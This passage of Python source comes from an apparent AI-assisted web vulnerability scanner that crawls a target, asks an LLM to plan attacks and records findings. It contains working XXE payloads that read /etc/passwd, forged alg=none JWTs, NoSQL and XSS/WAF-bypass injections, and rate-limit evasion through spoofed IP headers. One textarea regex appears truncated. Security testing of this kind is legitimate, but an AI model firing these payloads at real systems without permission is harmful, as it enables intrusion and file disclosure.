keyword, test_func in fallback_tests.items(): if keyword in prompt_lower: await test_func() tests_run = True if not tests_run: await self.log("warning", " No fallback test matched. LLM required for this test type.") async def _test_xxe_fallback(self): """Test for XXE without LLM""" await self.log("info", " Testing XXE (XML External Entity)...") xxe_payloads = [ '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>', '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><data>&xxe;</data>', '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe;]><foo>test</foo>', ] for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]: if not endpoint: continue for payload in xxe_payloads: try: headers = {"Content-Type": "application/xml"} async with self.session.post(endpoint, data=payload, headers=headers) as resp: body = await resp.text() if "root:" in body or "daemon:" in body or "entity" in body.lower(): finding = Finding( id=hashlib.md5(f"xxe{endpoint}".encode()).hexdigest()[:8], title="XXE (XML External Entity) Injection", severity="critical", vulnerability_type="xxe", cvss_score=9.1, cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", cwe_id="CWE-611", description="XML External Entity injection allows reading local files and potentially SSRF.", affected_endpoint=endpoint, payload=payload[:200], evidence=body[:500], remediation="Disable external entity processing in XML parsers.
Use JSON instead of XML where possible.", ai_verified=False ) await self._add_finding(finding) await self.log("warning", f" [FOUND] XXE at {endpoint[:50]}") return except: pass async def _test_race_condition_fallback(self): """Test for race conditions without LLM""" await self.log("info", " Testing Race Conditions...") # Find form endpoints that might be vulnerable target_endpoints = [] for form in self.recon.forms[:3]: if isinstance(form, dict): action = form.get("action", "") if action: target_endpoints.append(action) if not target_endpoints: target_endpoints = [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3] if _get_endpoint_url(ep)] for endpoint in target_endpoints: try: # Send multiple concurrent requests and release each response afterwards tasks = [] for _ in range(10): tasks.append(self.session.get(endpoint)) responses = await asyncio.gather(*tasks, return_exceptions=True) # Check for inconsistent responses (potential race condition indicator) statuses = [r.status for r in responses if hasattr(r, 'status')] for r in responses: if hasattr(r, 'release'): r.release() if len(set(statuses)) > 1: await self.log("info", f" Inconsistent responses detected at {endpoint[:50]} - potential race condition") except: pass async def _test_rate_limit_fallback(self): """Test for rate limiting bypass without LLM""" await self.log("info", " Testing Rate Limiting...") headers_to_try = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Real-IP": "127.0.0.1"}, {"X-Originating-IP": "127.0.0.1"}, {"X-Client-IP": "127.0.0.1"}, {"True-Client-IP": "127.0.0.1"}, ] for endpoint in [self.target]: for headers in headers_to_try: try: # Send many requests, rotating the spoofed client IP on whichever bypass header is under test for i in range(20): for header_name in list(headers.keys()): headers[header_name] = f"192.168.1.{i}" async with self.session.get(endpoint, headers=headers) as resp: if resp.status == 429: await self.log("info", f" Rate limit hit at request {i}") break if i == 19: await self.log("warning", f" [POTENTIAL] No rate limiting detected with header bypass") except: pass async def _test_idor_fallback(self): """Test for IDOR/BOLA without LLM""" await self.log("info", " Testing IDOR/BOLA...") # Find endpoints with parameters (recon.parameters maps endpoint URL -> parameter names) for url, param_names in self.recon.parameters.items(): if not url: continue for param in param_names[:2]: # Try changing IDs for test_id in ["1", "2", "0", "-1", "9999999"]: try: parsed = urlparse(url) test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{param}={test_id}" async with self.session.get(test_url) as resp: if resp.status == 200: body = await resp.text() if len(body) > 100: await self.log("debug", f" Got response for {param}={test_id}") except: pass async def _test_bfla_fallback(self): """Test for BFLA without LLM""" await self.log("info", " Testing BFLA (Broken Function Level Authorization)...") admin_paths = ["/admin", "/api/admin", "/api/v1/admin", "/manage", "/dashboard", "/internal"] for path in admin_paths: try: url = urljoin(self.target, path) async with self.session.get(url) as resp: if resp.status == 200: await self.log("warning", f" [POTENTIAL] Admin endpoint accessible: {url}") elif resp.status in [401, 403]: await self.log("debug", f" Protected: {url}") except: pass async def _test_jwt_fallback(self): """Test for JWT vulnerabilities without LLM""" await self.log("info", " Testing JWT vulnerabilities...") # Try none algorithm and other JWT attacks: an alg=none token with an empty signature, then an HS256 token with a junk signature ("test"); both encode {"sub": "1234567890", "name": "admin"} and only probe whether unverified tokens are accepted jwt_tests = [ "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.test", ] for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not endpoint: continue for jwt in jwt_tests: try: headers = {"Authorization": f"Bearer {jwt}"} async with self.session.get(endpoint, headers=headers) as resp: if resp.status == 200: await self.log("debug", f" JWT accepted at {endpoint[:50]}") except: pass async def _test_graphql_fallback(self): """Test for GraphQL vulnerabilities without LLM""" await self.log("info", " Testing GraphQL...") graphql_endpoints = ["/graphql", "/api/graphql", "/v1/graphql", "/query"] introspection_query = '{"query": "{ __schema { types { name } } }"}' for path in graphql_endpoints: try: url = urljoin(self.target, path) headers = {"Content-Type": "application/json"} async with self.session.post(url, data=introspection_query, headers=headers) as resp: if resp.status == 200: body = await resp.text() if "__schema" in body or "types" in body: finding = Finding( id=hashlib.md5(f"graphql{url}".encode()).hexdigest()[:8], title="GraphQL Introspection Enabled", severity="low", vulnerability_type="graphql_introspection", cvss_score=3.0, cwe_id="CWE-200", description="GraphQL introspection is enabled, exposing the entire API schema.", affected_endpoint=url, evidence=body[:500], remediation="Disable introspection in production environments.", ai_verified=False ) await self._add_finding(finding) await self.log("warning", f" [FOUND] GraphQL introspection at {url}") except: pass async def _test_nosql_fallback(self): """Test for NoSQL injection without LLM""" await self.log("info", " Testing NoSQL injection...") nosql_payloads = [ '{"$gt": ""}', '{"$ne": null}', '{"$where": "1==1"}', "[$gt]=&", '{"username": {"$gt": ""}, "password": {"$gt": ""}}', ] # recon.parameters maps endpoint URL -> parameter names for url, param_names in list(self.recon.parameters.items())[:5]: if not url: continue for param in param_names[:2]: for payload in nosql_payloads: try: test_url = f"{url.split('?')[0]}?{param}={payload}" async with self.session.get(test_url) as resp: body = await resp.text() if resp.status == 200 and len(body) > 100: await self.log("debug", f" NoSQL payload accepted: {param}={payload[:30]}") except: pass async def _test_waf_bypass_fallback(self): """Test for WAF bypass without LLM""" await self.log("info", " Testing WAF bypass techniques...") bypass_payloads = [ "<script>alert(1)</script>", # Original "<scr<script>ipt>alert(1)</scr<script>ipt>", # Nested "<img src=x onerror=alert(1)>", # Event handler "%253Cscript%253Ealert(1)%253C%252Fscript%253E", # Double encoding "%3Cscript%3Ealert(1)%3C/script%3E", # URL encoded ] for endpoint in [self.target]: for payload in bypass_payloads: try: test_url = f"{endpoint}?test={payload}" async with self.session.get(test_url) as resp: if resp.status == 403: await self.log("debug", f" WAF blocked: {payload[:30]}") elif resp.status == 200: body = await resp.text() if payload in body or "alert(1)" in body: await self.log("warning", f" [POTENTIAL] WAF bypass: {payload[:30]}") except: pass async def _test_csp_bypass_fallback(self): """Test for CSP bypass without LLM""" await self.log("info", " Testing CSP bypass...") try: async with self.session.get(self.target) as resp: csp = resp.headers.get("Content-Security-Policy", "") if not csp: await self.log("warning", " No CSP header found") return # Check for weak CSP weaknesses = [] if "unsafe-inline" in csp: weaknesses.append("unsafe-inline allows inline scripts") if "unsafe-eval" in csp: weaknesses.append("unsafe-eval allows eval()")
if "*" in csp: weaknesses.append("Wildcard (*) in CSP is too permissive") if "data:" in csp: weaknesses.append("data: URI scheme can be abused") if weaknesses: finding = Finding( id=hashlib.md5(f"csp{self.target}".encode()).hexdigest()[:8], title="Weak Content Security Policy", severity="medium", vulnerability_type="csp_bypass", cvss_score=4.0, cwe_id="CWE-693", description=f"CSP has weaknesses: {'; '.join(weaknesses)}", affected_endpoint=self.target, evidence=f"CSP: {csp[:500]}", remediation="Remove unsafe-inline, unsafe-eval, wildcards, and data: from CSP.", ai_verified=False ) await self._add_finding(finding) await self.log("warning", f" [FOUND] Weak CSP: {', '.join(weaknesses)}") except: pass async def _ai_test_vulnerability(self, vuln_type: str): """Wrapper for backwards compatibility - now uses AI dynamic test""" await self._ai_dynamic_test(vuln_type) async def _execute_ai_test(self, test: Dict, vuln_type: str): """Execute an AI-generated test""" if not self.session: return try: url = test.get("url", self.target) method = test.get("method", "GET").upper() headers = test.get("headers", {}) params = test.get("params", {}) check = test.get("check", "") if method == "GET": async with self.session.get(url, params=params, headers=headers) as resp: body = await resp.text() response_headers = dict(resp.headers) else: async with self.session.post(url, data=params, headers=headers) as resp: body = await resp.text() response_headers = dict(resp.headers) # Use AI to analyze if vulnerability exists if self.llm.is_available() and check: analysis_prompt = f"""Analyze this response for {vuln_type} vulnerability. Check for: {check} Response status: {resp.status} Response headers: {dict(list(response_headers.items())[:10])} Response body (first 1000 chars): {body[:1000]} Is this vulnerable? 
Respond with exactly one line that starts with either "VULNERABLE: <evidence>" or "NOT_VULNERABLE: <reason>". """ result = await self.llm.generate(analysis_prompt) result_upper = result.upper() # "NOT_VULNERABLE:" also contains the substring "VULNERABLE:", so exclude it explicitly to avoid false positives if "VULNERABLE:" in result_upper and "NOT_VULNERABLE" not in result_upper: evidence = result.split(":", 1)[1].strip() if ":" in result else result finding = Finding( id=hashlib.md5(f"{vuln_type}{url}ai".encode()).hexdigest()[:8], title=f"AI-Detected {vuln_type.title()} Vulnerability", severity="medium", vulnerability_type=vuln_type, cvss_score=5.0, description=f"AI analysis detected potential {vuln_type} vulnerability.", affected_endpoint=url, evidence=evidence[:500], remediation=f"Review and remediate the {vuln_type} vulnerability.", ai_verified=True ) await self._add_finding(finding) await self.log("warning", f" [AI FOUND] {vuln_type} at {url[:50]}") except Exception as e: await self.log("debug", f" AI test execution error: {e}") async def _test_single_param(self, base_url: str, param: str, payload: str, vuln_type: str): """Test a single parameter with a payload""" if not self.session: return try: # Build test URL parsed = urlparse(base_url) base = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" test_url = f"{base}?{param}={payload}" async with self.session.get(test_url) as resp: body = await resp.text() response_data = { "status": resp.status, "body": body, "headers": dict(resp.headers), "url": str(resp.url), "method": "GET", "content_type": resp.headers.get("Content-Type", "") } is_vuln, evidence = await self._verify_vulnerability(vuln_type, payload, response_data) if is_vuln: await self.log("warning", f" [POTENTIAL] {vuln_type.upper()} found in {param}") # Confirm with AI confirmed = await self._ai_confirm_finding( vuln_type, test_url, param, payload, body[:500], evidence ) if confirmed: finding = self._create_finding(vuln_type, test_url, param, payload, evidence, response_data) await self._add_finding(finding) except Exception as e: await self.log("debug", f" Test error: {e}") async def log_script(self, level: str, message: str): """Log a script/tool message""" await self.log(level, message) async def log_llm(self, level: str, message: str): """Log an LLM/AI message - prefixed with [AI] or [LLM]""" if not message.startswith('[AI]') and not message.startswith('[LLM]'): message = f"[AI] {message}" await self.log(level, message) async def _add_finding(self, finding: Finding): """Add a finding and notify via callback""" self.findings.append(finding) await self.log("warning", f" [FOUND] {finding.title} - {finding.severity}") if self.finding_callback: try: await self.finding_callback(asdict(finding)) except Exception as e: print(f"Finding callback error: {e}") def _normalize_target(self, target: str) -> str: """Ensure target has proper scheme""" if not target.startswith(('http://', 'https://')): return f"https://{target}" return target async def _default_log(self, level: str, message: str): timestamp = datetime.utcnow().strftime("%H:%M:%S") print(f"[{timestamp}] [{level.upper()}] {message}") async def __aenter__(self): connector = aiohttp.TCPConnector(ssl=False, limit=30) timeout = aiohttp.ClientTimeout(total=30, connect=10) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", } headers.update(self.auth_headers) self.session = aiohttp.ClientSession( connector=connector, timeout=timeout, headers=headers, cookie_jar=aiohttp.CookieJar(unsafe=True) ) return self async def __aexit__(self, *args): if self.session: await
self.session.close() async def run(self) -> Dict[str, Any]: """Main execution method""" await self.log("info", "=" * 60) await self.log("info", " NEUROSPLOIT AI SECURITY AGENT") await self.log("info", "=" * 60) await self.log("info", f"Target: {self.target}") await self.log("info", f"Mode: {self.mode.value}") if self.llm.is_available(): await self.log("success", f"LLM Provider: {self.llm.provider.upper()} (Connected)") else: await self.log("error", "=" * 60) await self.log("error", " WARNING: LLM NOT CONFIGURED!") await self.log("error", "=" * 60) await self.log("warning", "Set ANTHROPIC_API_KEY in .env file") await self.log("warning", "Running with basic detection only (no AI enhancement)") if self.llm.error_message: await self.log("warning", f"Reason: {self.llm.error_message}") await self.log("info", "") try: if self.mode == OperationMode.RECON_ONLY: return await self._run_recon_only() elif self.mode == OperationMode.FULL_AUTO: return await self._run_full_auto() elif self.mode == OperationMode.PROMPT_ONLY: return await self._run_prompt_only() elif self.mode == OperationMode.ANALYZE_ONLY: return await self._run_analyze_only() else: return await self._run_full_auto() except Exception as e: await self.log("error", f"Agent error: {str(e)}") import traceback traceback.print_exc() return self._generate_error_report(str(e)) async def _update_progress(self, progress: int, phase: str): if self.progress_callback: await self.progress_callback(progress, phase) # ==================== RECONNAISSANCE ==================== async def _run_recon_only(self) -> Dict: """Comprehensive reconnaissance""" await self._update_progress(0, "Starting reconnaissance") # Phase 1: Initial probe await self.log("info", "[PHASE 1/4] Initial Probe") await self._initial_probe() await self._update_progress(25, "Initial probe complete") # Phase 2: Endpoint discovery await self.log("info", "[PHASE 2/4] Endpoint Discovery") await self._discover_endpoints() await self._update_progress(50, "Endpoint discovery complete") # Phase 3: Parameter discovery await self.log("info", "[PHASE 3/4] Parameter Discovery") await self._discover_parameters() await self._update_progress(75, "Parameter discovery complete") # Phase 4: Technology detection await self.log("info", "[PHASE 4/4] Technology Detection") await self._detect_technologies() await self._update_progress(100, "Reconnaissance complete") return self._generate_recon_report() async def _initial_probe(self): """Initial probe of the target""" try: async with self.session.get(self.target, allow_redirects=True) as resp: self.recon.live_hosts.append(self.target) body = await resp.text() # Extract base information await self._extract_links(body, self.target) await self._extract_forms(body, self.target) await self._extract_js_files(body, self.target) await self.log("info", f" Target is live: {resp.status}") except Exception as e: await self.log("error", f" Target probe failed: {e}") async def _discover_endpoints(self): """Discover endpoints through crawling and common paths""" # Common paths to check common_paths = [ "/", "/admin", "/login", "/api", "/api/v1", "/api/v2", "/user", "/users", "/account", "/profile", "/dashboard", "/search", "/upload", "/download", "/file", "/files", "/config", "/settings", "/admin/login", "/wp-admin", "/robots.txt", "/sitemap.xml", "/.git/config", "/api/users", "/api/login", "/graphql", "/api/graphql", "/swagger", "/api-docs", "/docs", "/health", "/status" ] base = self.target.rstrip('/') parsed_target = urlparse(self.target) # Add known vulnerable endpoints for 
common test sites if "vulnweb" in parsed_target.netloc or "testphp" in parsed_target.netloc: await self.log("info", " Detected test site - adding known vulnerable endpoints") common_paths.extend([ "/listproducts.php?cat=1", "/artists.php?artist=1", "/search.php?test=1", "/guestbook.php", "/comment.php?aid=1", "/showimage.php?file=1", "/product.php?pic=1", "/hpp/?pp=12", "/AJAX/index.php", "/secured/newuser.php", ]) elif "juice-shop" in parsed_target.netloc or "juiceshop" in parsed_target.netloc: common_paths.extend([ "/rest/products/search?q=test", "/api/Users", "/api/Products", "/rest/user/login", ]) elif "dvwa" in parsed_target.netloc: common_paths.extend([ "/vulnerabilities/sqli/?id=1&Submit=Submit", "/vulnerabilities/xss_r/?name=test", "/vulnerabilities/fi/?page=include.php", ]) tasks = [] for path in common_paths: tasks.append(self._check_endpoint(f"{base}{path}")) await asyncio.gather(*tasks, return_exceptions=True) # Crawl discovered pages for more endpoints for endpoint in list(self.recon.endpoints)[:10]: await self._crawl_page(_get_endpoint_url(endpoint)) await self.log("info", f" Found {len(self.recon.endpoints)} endpoints") async def _check_endpoint(self, url: str): """Check if endpoint exists""" try: async with self.session.get(url, allow_redirects=False) as resp: if resp.status not in [404, 403, 500, 502, 503]: endpoint_data = { "url": url, "method": "GET", "status": resp.status, "content_type": resp.headers.get("Content-Type", ""), "path": urlparse(url).path } if endpoint_data not in self.recon.endpoints: self.recon.endpoints.append(endpoint_data) except: pass async def _crawl_page(self, url: str): """Crawl a page for more links""" if not url: return try: async with self.session.get(url) as resp: body = await resp.text() await self._extract_links(body, url) except: pass async def _extract_links(self, body: str, base_url: str): """Extract links from HTML""" # Find href links hrefs = re.findall(r'href=["\']([^"\']+)["\']', body, re.I) # Find src links srcs = re.findall(r'src=["\']([^"\']+)["\']', body, re.I) # Find action links actions = re.findall(r'action=["\']([^"\']+)["\']', body, re.I) base_parsed = urlparse(base_url) base_domain = f"{base_parsed.scheme}://{base_parsed.netloc}" for link in hrefs + actions: if link.startswith('/'): full_url = base_domain + link elif link.startswith('http') and base_parsed.netloc in link: full_url = link else: continue # Skip external links and assets if any(ext in link.lower() for ext in ['.css', '.png', '.jpg', '.gif', '.ico', '.svg']): continue endpoint_data = { "url": full_url, "method": "GET", "path": urlparse(full_url).path } if endpoint_data not in self.recon.endpoints and len(self.recon.endpoints) < 100: self.recon.endpoints.append(endpoint_data) async def _extract_forms(self, body: str, base_url: str): """Extract forms from HTML""" form_pattern = r'<form[^>]*>(.*?)</form>' forms = re.findall(form_pattern, body, re.I | re.DOTALL) base_parsed = urlparse(base_url) for form_html in forms: # Extract action action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I) action = action_match.group(1) if action_match else base_url if action.startswith('/'): action = f"{base_parsed.scheme}://{base_parsed.netloc}{action}" elif not action.startswith('http'): action = base_url # Extract method method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I) method = (method_match.group(1) if method_match else "GET").upper() # Extract inputs inputs = re.findall(r'<input[^>]*name=["\']([^"\']+)["\'][^>]*>', form_html, re.I) textareas =
re.findall(r']*name=["\']([^"\']+)["\']', form_html, re.I) form_data = { "action": action, "method": method, "inputs": inputs + textareas } self.recon.forms.append(form_data) async def _extract_js_files(self, body: str, base_url: str): """Extract JavaScript files""" js_files = re.findall(r'src=["\']([^"\']*\.js)["\']', body, re.I) base_parsed = urlparse(base_url) for js in js_files[:10]: if js.startswith('/'): full_url = f"{base_parsed.scheme}://{base_parsed.netloc}{js}" elif js.startswith('http'): full_url = js else: continue if full_url not in self.recon.js_files: self.recon.js_files.append(full_url) # Try to extract API endpoints from JS await self._extract_api_from_js(full_url) async def _extract_api_from_js(self, js_url: str): """Extract API endpoints from JavaScript files""" try: async with self.session.get(js_url) as resp: content = await resp.text() # Find API patterns api_patterns = [ r'["\']/(api/[^"\']+)["\']', r'["\']/(v[0-9]/[^"\']+)["\']', r'fetch\s*\(\s*["\']([^"\']+)["\']', r'axios\.[a-z]+\s*\(\s*["\']([^"\']+)["\']', ] for pattern in api_patterns: matches = re.findall(pattern, content) for match in matches[:5]: if match.startswith('/'): base = urlparse(self.target) full_url = f"{base.scheme}://{base.netloc}{match}" else: full_url = match if full_url not in self.recon.api_endpoints: self.recon.api_endpoints.append(full_url) except: pass async def _discover_parameters(self): """Discover parameters in endpoints""" for endpoint in self.recon.endpoints[:20]: url = _get_endpoint_url(endpoint) parsed = urlparse(url) # Extract query parameters if parsed.query: params = parse_qs(parsed.query) self.recon.parameters[url] = list(params.keys()) # Also get parameters from forms for form in self.recon.forms: self.recon.parameters[form['action']] = form.get('inputs', []) total_params = sum(len(v) for v in self.recon.parameters.values()) await self.log("info", f" Found {total_params} parameters in {len(self.recon.parameters)} endpoints") async def _detect_technologies(self): """Detect technologies used""" try: async with self.session.get(self.target) as resp: headers = dict(resp.headers) body = await resp.text() # Server header if "Server" in headers: self.recon.technologies.append(f"Server: {headers['Server']}") # X-Powered-By if "X-Powered-By" in headers: self.recon.technologies.append(headers["X-Powered-By"]) # Technology signatures signatures = { "WordPress": ["wp-content", "wp-includes", "wordpress"], "Laravel": ["laravel", "XSRF-TOKEN", "laravel_session"], "Django": ["csrfmiddlewaretoken", "__admin__", "django"], "Express.js": ["express", "X-Powered-By: Express"], "ASP.NET": ["__VIEWSTATE", "asp.net", ".aspx"], "PHP": [".php", "PHPSESSID"], "React": ["react", "_reactRoot", "__REACT"], "Angular": ["ng-app", "ng-", "angular"], "Vue.js": ["vue", "__VUE", "v-if", "v-for"], "jQuery": ["jquery", "$.ajax"], "Bootstrap": ["bootstrap", "btn-primary"], } body_lower = body.lower() headers_str = str(headers).lower() for tech, patterns in signatures.items(): if any(p.lower() in body_lower or p.lower() in headers_str for p in patterns): if tech not in self.recon.technologies: self.recon.technologies.append(tech) except Exception as e: await self.log("debug", f"Tech detection error: {e}") await self.log("info", f" Detected: {', '.join(self.recon.technologies[:5]) or 'Unknown'}") # ==================== VULNERABILITY TESTING ==================== async def _run_full_auto(self) -> Dict: """Full automated assessment""" await self._update_progress(0, "Starting full assessment") # Phase 1: Reconnaissance 
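# Recon output (endpoints, forms, parameters, technologies) feeds the AI attack-surface analysis in phase 2 and the payload targeting in phase 3.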
await self.log("info", "[PHASE 1/5] Reconnaissance") await self._run_recon_only() await self._update_progress(20, "Reconnaissance complete") # Phase 2: AI Attack Surface Analysis await self.log("info", "[PHASE 2/5] AI Attack Surface Analysis") attack_plan = await self._ai_analyze_attack_surface() await self._update_progress(30, "Attack surface analyzed") # Phase 3: Vulnerability Testing await self.log("info", "[PHASE 3/5] Vulnerability Testing") await self._test_all_vulnerabilities(attack_plan) await self._update_progress(70, "Vulnerability testing complete") # Phase 4: AI Finding Enhancement await self.log("info", "[PHASE 4/5] AI Finding Enhancement") await self._ai_enhance_findings() await self._update_progress(90, "Findings enhanced") # Phase 5: Report Generation await self.log("info", "[PHASE 5/5] Report Generation") report = await self._generate_full_report() await self._update_progress(100, "Assessment complete") return report async def _ai_analyze_attack_surface(self) -> Dict: """Use AI to analyze attack surface""" if not self.llm.is_available(): return self._default_attack_plan() # Build detailed context for AI analysis endpoint_details = [] for ep in self.recon.endpoints[:15]: url = _get_endpoint_url(ep) method = _get_endpoint_method(ep) parsed = urlparse(url) params = list(parse_qs(parsed.query).keys()) if parsed.query else [] endpoint_details.append(f" - [{method}] {parsed.path or '/'}" + (f" params: {params}" if params else "")) form_details = [] for form in self.recon.forms[:10]: if isinstance(form, str): form_details.append(f" - {form}") continue action = form.get('action', 'unknown') if isinstance(form, dict) else str(form) method = form.get('method', 'GET').upper() if isinstance(form, dict) else 'GET' inputs = form.get('inputs', []) if isinstance(form, dict) else [] fields = [] for f in inputs[:5]: if isinstance(f, str): fields.append(f) elif isinstance(f, dict): fields.append(f.get('name', 'unnamed')) form_details.append(f" - [{method}] {action} fields: {fields}") context = f"""**Target Analysis Request** Target: {self.target} Scope: Web Application Security Assessment User Instructions: {self.custom_prompt or 'Comprehensive security assessment'} **Reconnaissance Summary:** Technologies Detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'Not yet identified'} Endpoints Discovered ({len(self.recon.endpoints)} total): {chr(10).join(endpoint_details) if endpoint_details else ' None yet'} Forms Found ({len(self.recon.forms)} total): {chr(10).join(form_details) if form_details else ' None yet'} Parameters Identified: {list(self.recon.parameters.keys())[:15] if self.recon.parameters else 'None yet'} API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'None identified'}""" prompt = f"""Analyze this attack surface and create a prioritized, focused testing plan. {context} **Analysis Requirements:** 1. **Technology-Based Prioritization:** - If PHP detected → prioritize LFI, RCE, Type Juggling - If ASP.NET/Java → prioritize Deserialization, XXE - If Node.js → prioritize Prototype Pollution, SSRF - If API/REST → prioritize IDOR, Mass Assignment, JWT issues 2. **High-Risk Endpoint Identification:** - Login/authentication endpoints - File upload/download functionality - Admin/management interfaces - API endpoints with user input - Search/query parameters 3. **Parameter Risk Assessment:** - Parameters named: id, user, file, path, url, redirect, callback - Hidden form fields - Parameters accepting complex input 4. 
**Attack Vector Suggestions:** - Specific payloads based on detected technologies - Chained attack scenarios - Business logic flaws to test **Respond in JSON format:** {{ "priority_vulns": ["sqli", "xss", "idor", "lfi"], "high_risk_endpoints": ["/api/users", "/admin/upload"], "focus_parameters": ["id", "file", "redirect"], "attack_vectors": [ "Test user ID parameter for IDOR", "Check file upload for unrestricted types", "Test search parameter for SQL injection" ], "technology_specific_tests": ["PHP: test include parameters", "Check for Laravel debug mode"] }}""" try: response = await self.llm.generate(prompt, "You are an experienced penetration tester planning an assessment. Prioritize based on real-world attack patterns and the specific technologies detected. Be specific and actionable.") match = re.search(r'\{.*\}', response, re.DOTALL) if match: return json.loads(match.group()) except Exception as e: await self.log("debug", f"AI analysis error: {e}") return self._default_attack_plan() def _default_attack_plan(self) -> Dict: """Default attack plan""" return { "priority_vulns": ["sqli", "xss", "lfi", "ssti", "ssrf"], "high_risk_endpoints": [_get_endpoint_url(e) for e in self.recon.endpoints[:10]], "focus_parameters": [], "attack_vectors": [] } async def _test_all_vulnerabilities(self, plan: Dict): """Test for all vulnerability types""" vuln_types = plan.get("priority_vulns", ["sqli", "xss", "lfi", "ssti"]) await self.log("info", f" Testing for: {', '.join(vuln_types)}") # Get testable endpoints test_targets = [] # Add endpoints with parameters (extract params from URL if present) for endpoint in self.recon.endpoints[:20]: url = _get_endpoint_url(endpoint) parsed = urlparse(url) base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" if parsed.query: # URL has parameters - extract them params = list(parse_qs(parsed.query).keys()) test_targets.append({ "url": base_url, "method": "GET", "params": params, "original_url": url }) await self.log("debug", f" Found endpoint with params: {url[:60]}... 
params={params}") elif url in self.recon.parameters: test_targets.append({"url": url, "method": "GET", "params": self.recon.parameters[url]}) # Add forms for form in self.recon.forms[:10]: test_targets.append({ "url": form['action'], "method": form['method'], "params": form.get('inputs', []) }) # If no parameterized endpoints, test base endpoints with common params if not test_targets: await self.log("warning", " No parameterized endpoints found, testing with common params") for endpoint in self.recon.endpoints[:5]: test_targets.append({ "url": _get_endpoint_url(endpoint), "method": "GET", "params": ["id", "q", "search", "page", "file", "url", "cat", "artist", "item"] }) # Also test the main target with common params test_targets.append({ "url": self.target, "method": "GET", "params": ["id", "q", "search", "page", "file", "url", "path", "redirect", "cat", "item"] }) await self.log("info", f" Total targets to test: {len(test_targets)}") for target in test_targets: # Check for cancellation if self.is_cancelled(): await self.log("warning", "Scan cancelled by user") return url = target.get('url', '') await self.log("info", f" Testing: {url[:60]}...") for vuln_type in vuln_types: if self.is_cancelled(): return finding = await self._test_vulnerability_type( url, vuln_type, target.get('method', 'GET'), target.get('params', []) ) if finding: await self._add_finding(finding) async def _test_vulnerability_type(self, url: str, vuln_type: str, method: str = "GET", params: List[str] = None) -> Optional[Finding]: """Test for a specific vulnerability type""" payloads = self.PAYLOADS.get(vuln_type, []) parsed = urlparse(url) base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" # Get existing params or use provided existing_params = parse_qs(parsed.query) if parsed.query else {} test_params = params or list(existing_params.keys()) or ["id", "q", "search"] for payload in payloads[:8]: for param in test_params[:5]: # Skip if already tested test_key = f"{base_url}:{param}:{vuln_type}:{hash(payload) % 10000}" if test_key in self.tested_payloads: continue self.tested_payloads.add(test_key) try: # Build request test_data = {**existing_params, param: payload} # First, get baseline response baseline_resp = await self._make_request(base_url, method, {param: "test123"}) # Test with payload test_resp = await self._make_request(base_url, method, test_data) if not test_resp: continue # Check for vulnerability is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, baseline_resp ) if is_vuln: # Double-check with AI to avoid false positives if self.llm.is_available(): confirmed = await self._ai_confirm_finding( vuln_type, url, param, payload, test_resp.get('body', '')[:2000], evidence ) if not confirmed: continue return self._create_finding( vuln_type, url, param, payload, evidence, test_resp ) except asyncio.TimeoutError: # Timeout might indicate blind injection if vuln_type == "sqli" and "SLEEP" in payload.upper(): return self._create_finding( vuln_type, url, param, payload, "Request timeout - possible time-based blind SQLi", {"status": "timeout"} ) except Exception as e: await self.log("debug", f"Test error: {e}") return None async def _make_request(self, url: str, method: str, params: Dict) -> Optional[Dict]: """Make HTTP request and return response details""" try: if method.upper() == "GET": async with self.session.get(url, params=params, allow_redirects=False) as resp: body = await resp.text() return { "status": resp.status, "body": body, "headers": dict(resp.headers), "url": 
str(resp.url) } else: async with self.session.post(url, data=params, allow_redirects=False) as resp: body = await resp.text() return { "status": resp.status, "body": body, "headers": dict(resp.headers), "url": str(resp.url) } except Exception as e: return None async def _verify_vulnerability(self, vuln_type: str, payload: str, response: Dict, baseline: Optional[Dict]) -> Tuple[bool, str]: """Verify if response indicates vulnerability""" body = response.get('body', '').lower() body_original = response.get('body', '') # Keep original case for some checks status = response.get('status', 0) if vuln_type == "sqli": indicators = self.VULN_INDICATORS["sqli"]["errors"] for indicator in indicators: if indicator in body: await self.log("debug", f" SQLi indicator found: {indicator}") return True, f"SQL error message: '{indicator}'" # Additional SQL error patterns sql_error_patterns = [ "mysql", "mysqli", "pg_", "sqlite", "oracle", "mssql", "syntax error", "unexpected", "unterminated", "quoted string", "warning:", "error:", "fatal error", "exception", "jdbc", "odbc", "sqlstate", "native client" ] for pattern in sql_error_patterns: if pattern in body: await self.log("debug", f" SQLi pattern found: {pattern}") return True, f"SQL error pattern: '{pattern}'" # Check for different response indicating SQL injection if baseline: baseline_body = baseline.get('body', '') diff = abs(len(body) - len(baseline_body)) # More aggressive detection for boolean-based SQLi if diff > 100 and ("OR" in payload.upper() or "AND" in payload.upper()): await self.log("debug", f" SQLi response size diff: {diff}") return True, f"Response size 